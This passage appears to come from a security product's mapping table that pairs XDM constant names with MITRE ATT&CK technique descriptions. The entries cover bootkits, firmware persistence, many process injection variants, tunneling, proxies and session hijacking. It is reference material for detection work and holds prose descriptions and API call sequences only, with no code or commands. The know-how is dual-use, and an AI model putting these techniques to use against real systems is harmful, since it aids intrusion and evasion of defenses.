social media services, personal webmail, and other non-enterprise controlled services. These services are
more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the
goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create
fake social media accounts and message employees for potential job opportunities. Doing so allows a
plausible reason for asking about services, policies, and software that's running in an environment. The
adversary can then send malicious links or attachments through these services. A common example is to
build rapport with a target via social media, then send content to a personal webmail service that the target
uses on their work computer. This allows an adversary to bypass some email restrictions on the work
account, and the target is more likely to open the file since it's something they were expecting. If the
payload doesn't work as expected, the adversary can continue normal communications and troubleshoot
with the target on how to get it working. https://attack.mitre.org/techniques/T1566/003

T1542 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During
the booting process of a computer, firmware and various startup services are loaded before the operating
system. These programs control flow of execution before the operating system takes control.(Citation:
Wikipedia Booting) Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/
Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer
below the operating system. This can be particularly difficult to detect as malware at this level will not be
detected by host software-based defenses. https://attack.mitre.org/techniques/T1542

T1542.003 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_BOOTKIT Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system
and may make it difficult to perform full remediation unless an organization suspects one was used and can
act accordingly. A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the
Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR
is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location
of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting
execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011) The MBR
passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw
access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
https://attack.mitre.org/techniques/T1542/003

T1542.002 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_COMPONENT_FIRMWARE Adversaries may modify component firmware to persist on systems. Some adversaries may employ
sophisticated means to compromise computer components and install malicious firmware that will execute
adversary code outside of the operating system and main system firmware or BIOS. This technique may be
similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other
system components/devices that may not have the same capability or level of integrity checking. Malicious
component firmware could provide both a persistent level of access to systems despite potential typical
failures to maintain access and hard disk re-images, as well as a way to evade host software-based
defenses and integrity checks. https://attack.mitre.org/techniques/T1542/002
Original Mapped Description

T1542.004 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_ROMMONKIT Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary
code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco
Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) ROMMON is a Cisco network device
firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software
when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/
T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through
TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This
provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that
may be difficult to detect. https://attack.mitre.org/techniques/T1542/004

T1542.001 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_SYSTEM_FIRMWARE Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and
The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of
system firmware that operate as the software interface between the operating system and hardware of a
computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI) System firmware
like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to
perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give
sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a
system that may be difficult to detect. https://attack.mitre.org/techniques/T1542/001

T1542.005 XDM_CONST.MITRE_TECHNIQUE_PRE_OS_BOOT_TFTP_BOOT Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial
File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators
to load configuration-controlled network device images from a centralized management server. Netbooting
is one option in the boot sequence and can be used to centralize, manage, and control device images.
Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP
server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/
T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to
modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain
control of the network device while minimizing detection through use of a standard functionality. This
technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the
network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks) https://
attack.mitre.org/techniques/T1542/005

T1057 XDM_CONST.MITRE_TECHNIQUE_PROCESS_DISCOVERY Adversaries may attempt to get information about running processes on a system. Information obtained
could be used to gain an understanding of common software/applications running on systems within the
network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/
T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary
fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain
details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd]
(https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/
techniques/T1059/001). Information about processes can also be extracted from the output of [Native API]
(https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux,
this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc.
https://attack.mitre.org/techniques/T1057

T1055 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION Adversaries may inject code into processes in order to evade process-based defenses as well as possibly
elevate privileges. Process injection is a method of executing arbitrary code in the address space of a
separate live process. Running code in the context of another process may allow access to the process's
memory, system/network resources, and possibly elevated privileges. Execution via process injection may
also evade detection from security products since the execution is masked under a legitimate process.
There are many different ways to inject code into a process, many of which abuse legitimate functionalities.
These implementations exist for every major OS but are typically platform specific. More sophisticated
samples may perform multiple process injections to segment modules and further evade detection, utilizing
named pipes or other inter-process communication (IPC) mechanisms as a communication channel. https://
attack.mitre.org/techniques/T1055

T1055.004 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_ASYNCHRONOUS_PROCEDURE_CALL Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in
order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of
executing arbitrary code in the address space of a separate live process. APC injection is commonly
performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread.
Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A
handle to an existing victim process is first created with native Windows API calls such as OpenThread. At
this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious
DLL). A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in
which malicious code can be written and executed before the process' entry point (and potentially
subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing
(Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code
previously written to the global atom table.(Citation: Microsoft Atom Table) Running code in the context of
another process may allow access to the process's memory, system/network resources, and possibly
elevated privileges. Execution via APC injection may also evade detection from security products since the
execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/004

T1055.001 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_DYNAMIC_LINK_LIBRARY_INJECTION Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based
defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the
address space of a separate live process. DLL injection is commonly performed by writing the path to a
DLL in the virtual address space of the target process before loading the DLL by invoking a new thread.
The write can be performed with native Windows API calls such as VirtualAllocEx and
WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API
responsible for loading the DLL). (Citation: Elastic Process Injection July 2017) Variations of this method
such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL
when writing into process) overcome the address relocation issue as well as the additional APIs to invoke
execution (since these methods load and execute the files in memory by manually preforming the function
of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July
2017) Running code in the context of another process may allow access to the process's memory, system/
network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection
from security products since the execution is masked under a legitimate process. https://attack.mitre.org/
techniques/T1055/001

T1055.011 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_EXTRA_WINDOW_MEMORY_INJECTION Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade
process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing
arbitrary code in the address space of a separate live process. Before creating a window, graphical
Windows-based processes must prescribe to or register a windows class, which stipulate appearance and
behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft
Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to
be appended to the allocated memory of each instance of that class. This EWM is intended to store data
specific to that window and has specific application programming interface (API) functions to set and get its
value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function) Although
small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure.
Malware may possibly utilize this memory location in part of an attack chain that includes writing code to
shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by
returning execution control to the address in the process’s EWM. Execution granted through EWM injection
may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to
shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and
CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples
may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering
a combination of windows procedures and other system functions that will rewrite the malicious payload
inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013)
(Citation: WeLiveSecurity Gapz and Redyms Mar 2013) Running code in the context of another process
may allow access to the process's memory, system/network resources, and possibly elevated privileges.
Execution via EWM injection may also evade detection from security products since the execution is
masked under a legitimate process. https://attack.mitre.org/techniques/T1055/011
Original Mapped Description

T1055.002 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PORTABLE_EXECUTABLE_INJECTION Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses
as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address
space of a separate live process. PE injection is commonly performed by copying code (perhaps without a
file on disk) into the virtual address space of the target process before invoking it via a new thread. The
write can be performed with native Windows API calls such as VirtualAllocEx and
WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The
displacement of the injected code does introduce the additional requirement for functionality to remap
memory references. (Citation: Elastic Process Injection July 2017) Running code in the context of another
process may allow access to the process's memory, system/network resources, and possibly elevated
privileges. Execution via PE injection may also evade detection from security products since the execution
is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/002

T1055.009 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PROC_MEMORY Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-
based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing
arbitrary code in the address space of a separate live process. Proc memory injection involves enumerating
the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented
programming (ROP) payload with available gadgets/instructions. Each running process has its own
directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting
the target processes’ stack using memory mappings provided by the /proc filesystem. This information can
be used to enumerate offsets (including the stack) and gadgets (or instructions within the program that can
be used to build a malicious payload) otherwise hidden by process memory protections such as address
space layout randomization (ASLR). Once enumerated, the target processes’ memory map within /proc/
[pid]/maps can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux Injection)
(Citation: DD Man) Other techniques such as [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/
T1574/006) may be used to populate a target process with more available gadgets. Similar to [Process
Hollowing](https://attack.mitre.org/techniques/T1055/012), proc memory injection may target child
processes (such as a backgrounded copy of sleep).(Citation: GDS Linux Injection) Running code in the
context of another process may allow access to the process's memory, system/network resources, and
possibly elevated privileges. Execution via proc memory injection may also evade detection from security
products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/
T1055/009

T1055.013 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PROCESS_DOPPELGANGING Adversaries may inject malicious code into process via process doppelgänging in order to evade process-
based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing
arbitrary code in the address space of a separate live process. Windows Transactional NTFS (TxF) was
introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data
integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle
transaction is terminated, all other handles are isolated from the writer and may only read the committed
version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts)
To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write
transaction. (Citation: Microsoft Where to use TxF) Although deprecated, the TxF application programming
interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)
Adversaries may abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/
techniques/T1055). Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), process
doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of
malicious code that may evade defenses and detection. Process doppelgänging's use of TxF also avoids
the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and
SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017) Process Doppelgänging is
implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017): * Transact – Create a TxF
transaction using a legitimate executable then overwrite the file with malicious code. These changes will be
isolated and only visible within the context of the transaction. * Load – Create a shared section of memory
and load the malicious executable. * Rollback – Undo changes to original executable, effectively removing
malicious code from the file system. * Animate – Create a process from the tainted section of memory and
initiate execution. This behavior will likely not result in elevated privileges since the injected process was
spawned from (and thus inherits the security context) of the injecting process. However, execution via
process doppelgänging may evade detection from security products since the execution is masked under a
legitimate process. https://attack.mitre.org/techniques/T1055/013

T1055.012 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PROCESS_HOLLOWING Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-
based defenses. Process hollowing is a method of executing arbitrary code in the address space of a
separate live process. Process hollowing is commonly performed by creating a process in a suspended
state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim
process can be created with native Windows API calls such as CreateProcess, which includes a flag to
suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as
ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code,
and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread
respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017) This is very similar to
[Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather
than targeting an existing process. This behavior will likely not result in elevated privileges since the
injected process was spawned from (and thus inherits the security context) of the injecting process.
However, execution via process hollowing may also evade detection from security products since the
execution is masked under a legitimate process. https://attack.mitre.org/techniques/T1055/012

T1055.008 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_PTRACE_SYSTEM_CALLS Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to
evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a
method of executing arbitrary code in the address space of a separate live process. Ptrace system call
injection involves attaching to and modifying a running process. The ptrace system call enables a
debugging process to observe and control another process (and each individual thread), including changing
memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed
by writing arbitrary code into a running process (ex: malloc) then invoking that memory with
PTRACE_SETREGS to set the register containing the next instruction to execute. Ptrace system call injection
can also be done with PTRACE_POKETEXT/PTRACE_POKEDATA, which copy data to a specific address in the
target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)
(Citation: Medium Ptrace JUL 2018) Ptrace system call injection may not be possible targeting processes
that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) Running code in the
context of another process may allow access to the process's memory, system/network resources, and
possibly elevated privileges. Execution via ptrace system call injection may also evade detection from
security products since the execution is masked under a legitimate process. https://attack.mitre.org/
techniques/T1055/008

T1055.003 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_THREAD_EXECUTION_HIJACKING Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses
as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in
the address space of a separate live process. Thread Execution Hijacking is commonly performed by
suspending an existing process then unmapping/hollowing its memory, which can then be replaced with
malicious code or the path to a DLL. A handle to an existing victim process is first created with native
Windows API calls such as OpenThread. At this point the process can be suspended then written to,
realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx,
WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process
Injection July 2017) This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/
T1055/012) but targets an existing process rather than creating a process in a suspended state. Running
code in the context of another process may allow access to the process's memory, system/network
resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade
detection from security products since the execution is masked under a legitimate process. https://
attack.mitre.org/techniques/T1055/003

T1055.005 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_THREAD_LOCAL_STORAGE Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to
evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of
executing arbitrary code in the address space of a separate live process. TLS callback injection involves
manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before
reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or
cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to
specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/
techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).
(Citation: FireEye TLS Nov 2017) Running code in the context of another process may allow access to the
process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback
injection may also evade detection from security products since the execution is masked under a legitimate
process. https://attack.mitre.org/techniques/T1055/005
Original Mapped Description

T1055.014 XDM_CONST.MITRE_TECHNIQUE_PROCESS_INJECTION_VDSO_HIJACKING Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based
defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method
of executing arbitrary code in the address space of a separate live process. VDSO hijacking involves
redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable
code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an
adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object
to execute syscalls to open and map a malicious shared object. This code can then be invoked by
redirecting the execution flow of the process via patched memory address references stored in a process'
global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection
May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014) Running code in
the context of another process may allow access to the process's memory, system/network resources, and
possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security
products since the execution is masked under a legitimate process. https://attack.mitre.org/techniques/
T1055/014

T1572 XDM_CONST.MITRE_TECHNIQUE_PROTOCOL_TUNNELING Adversaries may tunnel network communications to and from a victim system within a separate protocol to
avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling
involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by
blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling
could also enable routing of network packets that would otherwise not reach their intended destination,
such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the
Internet. There are various means to encapsulate a protocol within another protocol. For example,
adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding
arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) [Protocol Tunneling](https://
attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://
attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2
infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in
conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://
attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. https://
attack.mitre.org/techniques/T1572

T1090 XDM_CONST.MITRE_TECHNIQUE_PROXY Adversaries may use a connection proxy to direct network traffic between systems or act as an
intermediary for network communications to a command and control server to avoid direct connections to
their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection,
including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend
Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control
communications, reduce the number of simultaneous outbound network connections, provide resiliency in
the face of connection loss, or to ride over existing trusted communications paths between victims to avoid
suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious
traffic. Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to
proxy command and control traffic. https://attack.mitre.org/techniques/T1090

T1090.004 XDM_CONST.MITRE_TECHNIQUE_PROXY_DOMAIN_FRONTING Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other
services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic
tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting
2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the
Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to
the address specified in the HTTP header after unwrapping the TLS header. A variation of the the
technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work
even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields
are ignored). For example, if domain-x and domain-y are customers of the same CDN, it is possible to
place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to
domain-x, however the CDN may route it to domain-y. https://attack.mitre.org/techniques/T1090/004

T1090.002 XDM_CONST.MITRE_TECHNIQUE_PROXY_EXTERNAL_PROXY Adversaries may use an external proxy to act as an intermediary for network communications to a
command and control server to avoid direct connections to their infrastructure. Many tools exist that enable
traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/
S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of
proxies to manage command and control communications, to provide resiliency in the face of connection
loss, or to ride over existing trusted communications paths to avoid suspicion. External connection proxies
are used to mask the destination of C2 traffic and are typically implemented with port redirectors.
Compromised systems outside of the victim environment may be used for these purposes, as well as
purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen
based on the low likelihood that a connection to them from a compromised system would be investigated.
Victim systems would communicate directly with the external proxy on the Internet and then the proxy
would forward communications to the C2 server. https://attack.mitre.org/techniques/T1090/002

T1090.001 XDM_CONST.MITRE_TECHNIQUE_PROXY_INTERNAL_PROXY Adversaries may use an internal proxy to direct command and control traffic between two or more systems
in a compromised environment. Many tools exist that enable traffic redirection through proxies or port
redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap.
(Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control
communications inside a compromised environment, to reduce the number of simultaneous outbound
network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted
communications paths between infected systems to avoid suspicion. Internal proxy connections may use
common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. By
using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic
while reducing the need for numerous connections to external systems. https://attack.mitre.org/techniques/
T1090/001

T1090.003 XDM_CONST.MITRE_TECHNIQUE_PROXY_MULTI_HOP_PROXY To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a
defender will be able to identify the last proxy traffic traversed before it enters their network; the defender
may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes
identifying the original source of the malicious traffic even more difficult by requiring the defender to trace
malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use
onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing) In the case of
network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised
devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By
leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add
custom code to the affected network devices that will implement onion routing between those nodes. This
custom onion routing network will transport the encrypted C2 traffic through the compromised population,
allowing adversaries to communicate with any device within the onion routing network. This method is
dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in
order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into
the organization’s WAN. Protocols such as ICMP may be used as a transport. https://attack.mitre.org/
techniques/T1090/003

T1012 XDM_CONST.MITRE_TECHNIQUE_QUERY_REGISTRY Adversaries may interact with the Windows Registry to gather information about the system, configuration,
and installed software. The Registry contains a significant amount of information about the operating
system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily
be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access
the Registry exist. Some of the information may help adversaries to further their operation within a network.
Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012)
during automated discovery to shape follow-on behaviors, including whether or not the adversary fully
infects the target and/or attempts specific actions. https://attack.mitre.org/techniques/T1012
Original Mapped Description

T1620 XDM_CONST.MITRE_TECHNIQUE_REFLECTIVE_CODE_LOADING Adversaries may reflectively load code into a process in order to conceal the execution of malicious
payloads. Reflective loading involves allocating then executing payloads directly within the memory of the
process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may
be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex:
position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation:
Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) Reflective code injection is very
similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads
code into the processes’ own memory instead of that of a separate process. Reflective loading may evade
process-based detections since the execution of the arbitrary code may be masked within a legitimate or
otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files
or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise
obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer
ACBackdoor)(Citation: S1 Old Rat New Tricks) https://attack.mitre.org/techniques/T1620

T1219 XDM_CONST.MITRE_TECHNIQUE_REMOTE_ACCESS_SOFTWARE An adversary may use legitimate desktop support and remote access software, such as Team Viewer,
Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target
systems within networks. These services are commonly used as legitimate technical support software, and
may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy,
and Teamviewer are used frequently when compared with other legitimate software commonly used by
adversaries. (Citation: Symantec Living off the Land) Remote access tools may be established and used
post-compromise as alternate communications channel for redundant access or as a way to establish an
interactive remote desktop session with the target system. They may also be used as a component of
malware to establish a reverse connection or back-connect to a service or adversary controlled system.
Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of
interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report)
(Citation: CrySyS Blog TeamSpy) https://attack.mitre.org/techniques/T1219

T1563 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICE_SESSION_HIJACKING Adversaries may take control of preexisting sessions with remote services to move laterally in an
environment. Users may use valid credentials to log into a service specifically designed to accept remote
connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established
that will allow them to maintain a continuous interaction with that service. Adversaries may commandeer
these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://
attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/
techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid
Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach
Post-mortem SSH Hijack) https://attack.mitre.org/techniques/T1563

T1563.002 XDM_CONST.MITRE_TECHNIQUE_REMOTE_SERVICE_SESSION_HIJACKING_RDP_HIJACKING Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.
